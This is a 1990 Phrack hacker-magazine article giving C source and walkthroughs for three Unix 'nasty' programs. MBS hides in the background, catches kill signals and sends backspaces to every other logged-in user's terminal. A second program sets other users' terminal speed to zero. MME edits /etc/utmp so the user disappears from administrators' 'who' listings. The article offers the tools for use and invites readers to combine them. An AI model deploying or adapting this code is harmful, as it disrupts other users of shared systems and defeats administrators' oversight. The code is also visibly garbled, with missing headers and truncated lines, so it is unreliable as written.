==Phrack Classic==
Volume Three, Issue 32, File #5 of 12
*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*
%P P%
%H C UNIX `nasties' PART I H%
%A by A%
%Z Sir Hackalot of PHAZE (10/20/90) Z%
%E E%
*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*
o Purpose of this file:
The purpose of this file is to share small C programs for the Unix
System V and/or BSD 4.3 operating systems which as in logical terms,
"Nasty". This "Nasty" can be termed better as Annoyance programs
or tricky programs.
The purpose of this text however, is NOT to teach one how to program
in C and or how to use the C compiler on Unix systems. This textfile
assumes you have a working knowledge of programming with C in the
UNIX environment.
o The UTMP Reader: ~~~~~~~~~~~~~~~~
First, I would like to start this text off by posting in a generic
/etc/utmp reader. The /etc/utmp reader is essential for applications
that deal with all the users online at a given time.
Here is the source:
- -CUT-HERE- - - - - - - - - - - - - - - - - -
/* WhatTTY -- Generic WHO UTMP Reader "Skeleton" : By Sir Hackalot / PhaZe
This is basically a skeleton program that is just a base for any UTMP operations.
This is the skeleton that PhaZe(soft) uses for anything that deals with reading the utmp file, such as MBS, SEND, VW, MME, and other utilities.
Applications: You can use this when you need to do something to everyone online, or when you need some sort of data from utmp, wtmp or any file that is like utmp. */
include
include /* This is the key to the whole thing */
include
include
main() { int handle; char *etc = "/etc/utmp"; struct utmp user;
handle = open(etc,O_RDONLY);
while(read(handle,&user,sizeof(user)) != 0) {
if (user.ut_type == USER_PROCESS)
printf("%s is on %s\n",user.ut_name,user.ut_line);
}
close(handle);
/* Simple, Right? / / To see anything that is waiting for a login, change USERPROCESS to LOGINPROCESS */ }
In the above program, this is what happens:
1. I assigned the variable "etc" to point at the string
"/etc/utmp", which is the utmp file.
2. I opened in in Read ONLY mode (O_RDONLY).
3. I started a loop that does not end until 0 bytes are
read into the user structure. The 0 bytes would mean
end of file.
Notice the line:
if (user.ut_type == USER_PROCESS)
What the above line does is to distinguish between a user
and a terminal waiting for a Login. The ut_type is defined
in utmp.h. There are many types. One of them is LOGIN_PROCESS.
That will be a terminal waiting for a login. If you wanted to see
all the TTYs waiting to be logged in on, you would change the
USER_PROCESS to LOGIN_PROCESS. Other types are things like
INIT_PROCESS. You can just look in utmp.h to see them.
Also notice that I have inclide "sys/types.h". If you do not include
this file, there will be an error in utmp.h, and other headers.
types.h has definitions for other TYPES of data, etc. So, if in
a header file you encounter a syntax error, you might need to include
sys/types.h
This program is just a skeleton, although it does print out who
is logged on, and to what TTY they are on. You will see how this
skeleton I wrote can be used. I used it to write MBS.
o MBS -- Mass BackSpace virus: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~
MBS may not be considered a virus, since it does not replicate
itself. However, it does "infect" every user that logs in, provided
the conditions are right.
The MBS virus uses the utmp reader to constantly read the utmp
file to find its next victim. Thus, eventually getting everyone, then
recycling to start again. Therefore catching people who login after
it is started.
Lets look at the source:
- -CUT-HERE- - - - - - - - - - - - - - - - - -
include
include
include
include
include
/* MBS - Mass BackSpace Virus!! v2.2 Deluxe+ (c) 1990 - Sir Hackalot PhaZeSOFT Ltd.
*/
char ent[10][100]; / This supports 10 immune people change 10 to x for more / int maxitem = 5; / Should be total # of immune dudes */ int truefalse = 0; int warn[10],bad; char fulltty[15], text[160], kstr[80]; FILE *totty, *strm; struct utmp u;
void kmes(fmt,boo) char *fmt; int boo; { if (boo != 0) { printf("MBSKERN: "); printf("%s",fmt); } if (boo == 0) { sprintf(fulltty,"/dev/%s",u.utline); totty = fopen(fulltty,"w"); fprintf(totty,"MBSKERN: %s",fmt); fclose(totty); } }
void initit() { /* Initialize our little "kernel" */ int xxx = 0; strcpy(ent[0],"technic"); strcpy(ent[1],"merlin"); strcpy(ent[2],"datawiz"); strcpy(ent[3],"par"); strcpy(ent[4],"Epsilon"); while (xxx < 11) { warn[xxx] = 0; xxx++; } kmes("Kernel Started.\n",1); }
void warnem(wcnt) /* Notify all the immune people ... / int wcnt; { if (bad == 0) { / keep from dumping core to disk */ if (warn[wcnt] < 2) { sprintf(kstr,"%s has started a backspace virus!\n",getlo kmes(kstr,0); warn[wcnt]++; } } }
int checkent(uname) /* Check for immunity / char *uname; { int cnt = 0; truefalse = 0; / assume NOT immune / while (cnt < maxitem) { if (strcmp(uname,ent[cnt]) == 0) { / if immune... / truefalse = 1; warn[cnt]++; / increment warning variable / warnem(cnt); / warn him if we have not */ }
cnt++;
}
return(truefalse); /* return immunity stat. 1=immune, 0 = not */
}
/* Purpose: Instead of just ignoring the signal via SIGIGN, we want to intercept it, and notify use */ void sighand(sig) int sig; { if(sig == 3) kmes("Ignoring Interrupt\n",1); if(sig == 15) kmes("Ignoring Termination Signal\n",1); if(sig == 4) kmes("Ignoring quit signal.\n",1); }
main(argc,argv) int argc; char *argv[];
{ int prio,pid,isg,handle; char buf[80]; char name[20],tty[20],time[20]; initit(); if (argc < 2) prio = 20; if (argc == 2) prio = atoi(argv[1]); if ((pid = fork()) > 0) { printf("Welcome to MBS 2.2 Deluxe, By Sir Hackalot [PHAZE]\n"); printf("Another Fine PhaZeSOFT production\n"); printf("Thanks to The DataWizard for Testing this\n"); printf("Hello to The Conflict\n"); sprintf(kstr,"Created Process %s (%d)\n\n",argv[0],pid); kmes(kstr,1); exit(0); /* KILL MOTHER PID, return to Shell & go background / } nice(prio); signal(SIGQUIT,sig_hand); signal(SIGINT,sig_hand); signal(SIGTERM,sig_hand); / That makes sure you HAVE to do a -9 or -10 to kill this thing. Sometimes, hitting control-c will kill of background processes! Add this line if you want it to continue after you hangup: signal(SIGHUP,SIGIGN); doing it will have the same effect as using NOHUP to to execute it. Get it? Nohup = no SIGHUP */ while(1) { /* "Kernel" Begins here and never ends */ handle = open("/etc/utmp",ORDONLY); while (read(handle,&u,sizeof(u)) != 0) { bad = 0; sprintf(fulltty,"/dev/%s",u.utline); if (strcmp(u.ut_name,getlogin()) != 0) {
/* Fix: Below is a line that optimizes the hosing/immune process
It skips the utmp entry if it is not a user. If it is, it
checks for immunity, then comes back. This is alot faster
and does not wear down cpu time/power */
if (u.ut_type == USER_PROCESS) isg = checkent(u.ut_name);
else isg = 1;
if (isg != 1) {
if((to_tty = fopen(full_tty,"w")) == NUL
bad = 1;
}
if (bad == 0) {
fprintf (to_tty, "\b\b\b");
fflush (to_tty);
}
fclose(to_tty);
}
}
}
close (handle);
}
}
I am going to try to take this bit by bit and explain how it works
so that maybe you can come up with some good ideas on creating
something similar.
I will start with the MAIN function. Here it is:
main(argc,argv) int argc; char *argv[];
{ int prio,pid,isg,handle; char buf[80]; char name[20],tty[20],time[20]; initit();
Obviously, this is the part of the code which initializes the main
variables used. The "main(argc,argv)" is there so it can accept
command line parameters. The command line parameters are just
for speed customization, which I will discuss later. Notice how
the variables are defined for the command line parameters:
int argc, char *argv[];
argc is the number of arguments, INCLUDING the name of the current
executable running. argv[] holds the strings in an array which make
up the parameters passed. argv[0] holds the name of the program,
while argv[1] holds the 1st parameter entered on the command line.
initit() is called to set up the necessary tables. All of
the variables defined at the top of the program are global, and alot
of these functions use the global variables, as does initit();.
if (argc < 2) prio = 20; if (argc == 2) prio = atoi(argv[1]);
Ok, the above two lines essentially parse the command line.
The MBS program only accepts ONE argument, which is the priority
value to add to the normal process priority. This is so you
can customize how fast MBS runs. If you want to burn CPU time,
you would invoke mbs by:
$ mbs 0
That would make the priority as fast as the current can run something.
MBS's default priority setting is 20, so that CPU time will be saved.
MBS is very fast however, and since alot of Unix systems like to
cache alot of frequently used data from disks, it gets fast after
it reads utmp a few times, since utmp will be cached until it changes.
However, you can run MBS with a number from 0-19, the higher the
number, the "less" priority it will have with the cpu.
if ((pid = fork()) > 0) { printf("Welcome to MBS 2.2 Deluxe, By Sir Hackalot [PHAZE]\n"); printf("Another Fine PhaZeSOFT production\n"); sprintf(kstr,"Created Process %s (%d)\n\n",argv[0],pid); kmes(kstr,1); exit(0); /* KILL MOTHER PID, return to Shell & go background */ }
The above is what sends MBS into the background. It calls fork(),
which creates another process off the old one. However, fork()
can be considered "cloning" a process, since it will use anything
beneath it. So, now you can assume there are TWO copies of MBS
running -- One in the foreground, and one in the background. However,
you may notice the exit(0). That first exit kills off the parent.
a second call to exit() would kill the child as well. notice the
call to "kmes". kmes is just a function that is defined earlier,
which I will discuss later.
nice(prio); signal(SIGQUIT,sighand); signal(SIGINT,sighand); signal(SIGTERM,sighand); /* signal(SIGHUP,SIGIGN); */
The above code is integral for the survival of the MBS program in
memory. The nice(prio) is what sets the new priority determined
by the command line parsing.
The signal() statements are basically what keeps MBS running. What
it does is catch INTERRUPTS, Quits, and a regular call to KILL.
the commented out portion would ignore requests to kill upon hangup.
This would keep MBS in the background after you logged off.
Why do this? Well, remember that the parent was affected by
its environment? Well, the new forked process is too. That means,
if you were 'cat'ting a file, and hit control-C to stop it, the
cat process would stop, but push the signal on to MBS, which would
cause MBS to exit, if it did not have a signal handler. The signal
calls setup signal handlers. What they do is tell the program
to goto the function sig_hand() when one of the 3 signals is
encountered. The commented signal just tells the program to ignore
the hangup signal. The sig_hand argument can be replaced with
SIG_IGN if you just want to plain ignore the signal and not handle it.
The SIGQUIT is sometimes the control-D character. That is why it
also must be dealt with. If the signals aren't ignored or caught,
MBS can easily kicked out of memory by YOU, by accident of course.
while(1) { /* "Kernel" Begins here and never ends */ handle = open("/etc/utmp",O_RDONLY);
The above starts the main loop. The begining of the loop is to open
the utmp file.
while (read(handle,&u,sizeof(u)) != 0) { bad = 0; sprintf(fulltty,"/dev/%s",u.utline); if (strcmp(u.utname,getlogin()) != 0) { if (u.uttype == USERPROCESS) isg = checkent(u.utname); else isg = 1; if (isg != 1) { if((totty = fopen(fulltty,"w")) == NULL) { bad = 1; } if (bad == 0) { fprintf (totty, "\b\b\b"); fflush (totty); } fclose(to_tty); } }
Above is the sub_main loop. what it does is go through the utmp
file, and on each entry, it prepares a path name to the TTY
of the current utmp entry (sprintf(fulltty...)). Then it checks
to see if it is YOU. If it is, the loop ends. If it is not, then
it sees if it is a User. If not, it ends the loop and goes to
the next.
If it is a user, it goes to checkent to see if that user has been
declared immune in the immunity tables (down below later..).
If the idiot is not immune, it attempts to open their tty. If it
cannot, it sets the bad flag, then ends the loop. If it can be
written to, it sends three backspaces, according to YOUR tty specs.
Then, it closes the opened tty, and the loop continues until the end.
}
close (handle); } }
The above is the end of the main loop. It closes handle (utmp) so
it can be reopened at the start of the loop at the beginning of the
file. The reason to not create a table of people to hit in memory
after one reading is so that MBS will stop after people logoff, and
to start when new ones logon. The constant reading of the utmp
file makes sure everyone gets hit, except immune people. Also,
the file must be closed before reopening, or else, after a few opens,
things will go to hell.
Here is the signal handler:
void sig_hand(sig) int sig; { if(sig == 3) kmes("Ignoring Interrupt\n",1); if(sig == 15) kmes("Ignoring Termination Signal\n",1); if(sig == 4) kmes("Ignoring quit signal.\n",1); }
It is very simple. when a signal is caught and sent to the handler,
the library function SIGNAL sends the signal number as an argument
to the function. The ones handled here are 3,4, and 15. But
this was just for effect. You could just have it print one line
no matter what the signal was, or just rip this function out and
put in SIG_IGN in the signal calls.
Below is the immunity check:
int checkent(uname) /* Check for immunity / char *uname; { int cnt = 0; truefalse = 0; / assume NOT immune / while (cnt < maxitem) { if (strcmp(uname,ent[cnt]) == 0) { / if immune... / truefalse = 1; warn[cnt]++; / increment warning variable / warnem(cnt); / warn him if we have not */ }
cnt++;
}
return(truefalse); /* return immunity stat. 1=immune, 0 = not */
}
Above, you see variables used that are not defined. They are
just variables that were declared as globals at the begining.
What this does is just compare the login name sent to it with
every name in the immunity table. If it finds the name on
the table matches, it will go and see if it should warn the
user. Also, the warn count is incremented so that the warning
function will know if the user has been warned.
Here is the warning function:
void warnem(wcnt) /* Notify all the immune people ... / int wcnt; { if (bad == 0) { / keep from dumping core to disk */ if (warn[wcnt] < 2) { sprintf(kstr,"%s has started a backspace virus!\n",getlo kmes(kstr,0); warn[wcnt]++; } } }
What this does is take the position number of the table entry and
checks and see if that entry has been warned before. It decides
this by checking its value. If it is less than two, that means
the user had not been warned. After it is sent, the function
incrememnts the warning flag so that they will never been warned
again until the program has stopped & restarted or someone else
runs one. The "if (bad == 0)" is there so that it only warns a
person if it can write to the tty.
Here is the kmes function you keep seeing:
void kmes(fmt,boo) char *fmt; int boo; { if (boo != 0) { printf("MBSKERN: "); printf("%s",fmt); } if (boo == 0) { sprintf(fulltty,"/dev/%s",u.utline); totty = fopen(fulltty,"w"); fprintf(totty,"MBSKERN: %s",fmt); fclose(totty); } }
All this is, is a fancy printf which prints a string with
"MBS_KERN:" stuck on the front of it. the BOO variable is just
so it can determine whether or not to send it to the local
screen or to another tty. It is just for looks.
Now, finally, we can look at the initializer:
void initit() { /* Initialize our little "kernel" */ int xxx = 0; strcpy(ent[0],"sirh"); strcpy(ent[1],"merlin"); strcpy(ent[2],"datawiz"); strcpy(ent[3],"par"); strcpy(ent[4],"epsilon"); while (xxx < 11) { warn[xxx] = 0; xxx++; } kmes("Kernel Started.\n",1); }
This is a very SIMPLE procedure. It just fills the list
with the people to keep immune. ent[..][..] is what holds
the immune list. It also zeros out the warning flags associated
with each user. ("sirh","merlin","par",etc. are acct. names)
This "virus" can do more than just send backspaces if you want it
to, but it will take modification. Some people have modified
it to include the next program, which is ioctl.c.
o IOCTL -- Set another's tty w/out read perms ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
The program ioctl is very very nice. What it does is basically
act like stty, but you don't have to use the < to change
someone else's terminal. Here is the listing:
- -CUT-HERE- - - - - - - - - - - - - - - - - -
include
include
include
include
define TIOC ('T'<<8)
define TCSETA (TIOC|2)
main(argc,argv) int argc; char *argv[]; { int x; struct sgttyb histty; if (argc == 1) exit(0); x = open(argv[1],OWRONLY); if (x == -1) exit(0); histty.sgispeed = B0; histty.sg_ospeed = B0; ioctl(x,TCSETA,&histty); }
- -CUT-HERE- - - - - - - - - - - - - - - - - -
The basis of the program is that you give a full path to the tty to nail. You need to be able to write to the tty for it to work.
Notice the two defines. They are in there so you do not have to include termio.h, and hence get 200 warnings of redefinition. This program is WAY simpler than MBS, but here is how it works:
main(argc,argv) int argc; char *argv[];
Of course, the above sets up the program to get command line
arguments.
int x;
struct sgttyb histty;
These are the variables. the sgttyb structure is what the ioctl
function call needs to do its duty. You can do a lot to a tty
using the structure, but this program only does 2 things to the
tty, as you shall soon see. Remember that the programs here can
be modified, especially this one. Just check out sgtty.h to
see the modes you can pop a tty into.
if (argc == 1) exit(0);
x = open(argv[1],O_WRONLY);
if (x == -1) exit(0);
The above three lines are the open/error checks. The 1st line
says that if the idiot did not give an argument then exit
the program. The argument needs to be the path to the
device driver (/dev/tty...).
The second line opens the tty for writing, and the third exits
upon error.
histty.sg_ispeed = B0;
histty.sg_ospeed = B0;
ioctl(x,TCSETA,&histty);
The above three lines are the meat of the program. What they
do is this:
Line 1 sets the input speed to 0 for the tty into the structure.
line 2 sets the output speed to 0 for the tty into the structure.
line 3 sets the tty according to the structure histty.
That is why if you look into the components of the structure, you can
do things, such as convert all output to uppercase for them,
set a higher baud, redefine CR mapping, redefine tabs, and
all sorts of things.
o MME - Make ME!: ~~~~~~~~~~~~~~~ MME is just a program which changes utmp for you, in order to hide you, or just mess with other user's minds. This is a different version then the one I originally put out. In this version, I removed the code that lets you change your tty. It just became too dangerous to change your tty.
Here is the listing:
- -CUT-HERE- - - - - - - - - - - - - - - - - -
include
include
include
include
include
char mytty; / For an exact match of utline */ char *backuputmp = "cp /etc/utmp /tmp/utmp.bak"; struct utmp *user;
main(argc,argv) int argc; char *argv[]; { int good= 0,cnt = 0,start = 1, index = 0; char err[80]; system(backup_utmp); printf("Welcome to MME 1.00 By Sir Hackalot\n"); printf("Another PHAZESOFT Production\n"); printf("Status:"); if (argc == 2) printf("Changing your login to %s\n",argv[1]); if (argc == 1) printf("Removing you from utmp\n");
utmpname("/etc/utmp");
mytty = strrchr(ttyname(0),'/'); /* Goto the last "/" */
strcpy(mytty,++mytty); /* Make a string starting one pos greater */
while (good != 1) {
user = getutent();
cnt++;
if (strcmp(user->ut_line,mytty) == 0) good =1;
}
utmpname("/etc/utmp"); /* Reset file pointer */
for(start = 0;start < cnt;start++) {
user = getutent(); /* Move the file pointer to where we are */
}
if (argc == 1) {
user->ut_type = LOGIN_PROCESS;
strcpy(user->ut_name,"LOGIN");
}
else user->ut_type = USER_PROCESS;
if (argc == 2) strcpy(user->ut_name,argv[1]);
pututline(user); /* Rewrite our new info */
endutent(); /* Tell the utmp functions we are through */
printf("Delete /tmp/utmp.bak if all is well.\n");
printf("Else, copy it to /etc/utmp.\n");
}
Well, of course, we will take this bit by bit.
Lets start with the standard ole function:
main(argc,argv) int argc; char *argv[];
This again sets up main so we can accept command line arguments.
char mytty; / For an exact match of utline */ char *backuputmp = "cp /etc/utmp /tmp/utmp.bak"; struct utmp *user;
These are just global variables.
Backup_utmp is the command we will issue to shell for a failsafe
mechanism.
system(backup_utmp);
printf("Welcome to MME 1.00 By Sir Hackalot\n");
printf("Another PHAZESOFT Production\n");
printf("Status:");
if (argc >= 2) printf("Changing your login to %s\n",argv[1]);
if (argc == 1) printf("Removing you from utmp\n");
The above is not hard to figure out. First, this uses the system
command to load shell, and execute our backup command.
Then, the lame credits are printed. Then, it tells you what it
is going to do based on the number of arguments passed from the
command line.
If no arguments are given (argc==1) then remove us from utmp.
If there are 1 or more (arc>=2) then change the login name.
utmpname("/etc/utmp"); mytty = strrchr(ttyname(0),'/'); /* Goto the last "/" / strcpy(mytty,++mytty); / Make a string starting one pos greater */
The above code does the following: utmpname is a system function
common to UNIX system V, XENIX system V, etc. It is part of the
utmp reading library. It sets the thing to be read when the
other system calls are made (getutent, etc..).
mytty is set to hold one's tty. It has to break down the result
of ttyname(0) to get a ttyname without a path.
while (good != 1) { user = getutent(); cnt++; if (strcmp(user->ut_line,mytty) == 0) good =1; }
This code gets your relative index from utmp and stores it into
cnt.
utmpname("/etc/utmp"); /* Reset file pointer / for(start = 0;start < cnt;start++) { user = getutent(); / Move the file pointer to where we are */ }
The above resets the file pointer used by the system calls, then
moves to your entry.
if (argc == 1) { user->uttype = LOGINPROCESS; strcpy(user->utname,"LOGIN"); } else user->uttype = USER_PROCESS;
if (argc == 2) strcpy(user->ut_name,argv[1]);
pututline(user); /* Rewrite our new info */
endutent(); /* Tell the utmp functions we are through */
The above is very simple as well. If you are removing yourself
from utmp, it will change your process type to LOGIN_PROCESS
so that when someone does a "who", you are not there.
It changes your login name to LOGIN so if some knowitall
system admin does a who -l, he wont see you. See, who -l shows
ttys waiting for login. SO, if i did not change your tty name,
we would see:
$ who -l
LOGIN ttyxx1
LOGIN tty002
joehack tty003
LOGIN tty004
See the problem there? That is why your name needs to be
changed to LOGIN.
If you are changing your login name, the "else" statment kicks
in and makes SURE you WILL show up in utmp, in case you had
removed yourself before.
Then, it takes the command line argument, and places it as your
login name in utmp.
pututline(user) then writes the info into the record where the
file pointer is... and that is your record. It puts the contents
of the things in the "user" structure into the file. then, endutent
closes the file.
Now, here is an example of using the file:
# mme Gh0d
that would change your login name to Gh0d in utmp.
# mme
that would remove you from sight. Remember!!: You need write perms
to utmp for this to work. You CAN test this program by changing
the filename in the function "utmpname" to somewhere else, say in
/tmp. You could copy /etc/utmp to /tmp/utmp, and test it there.
Then, you could use "who" to read the file in /tmp to show the
results.
o In Conclusion: ~~~~~~~~~~~~~~
These are just some of the programs I decided to put in this file.
I have a lot more, but I decided I would keep them for later
issues, and leave these two together since they can
be easily related. One person took MBS, and ioctl, and mended
them together to make a program that sets everyone's baud
rate to zero instead of sending 3 backspaces. They just put
in the above lines of code into the place where they sent
the backspaces, and used open instead of stream open (fopen).
It is very simple to mend these two things together.
Have a nice life! Keep on programmin'!
By: Sir Hackalot of Phaze.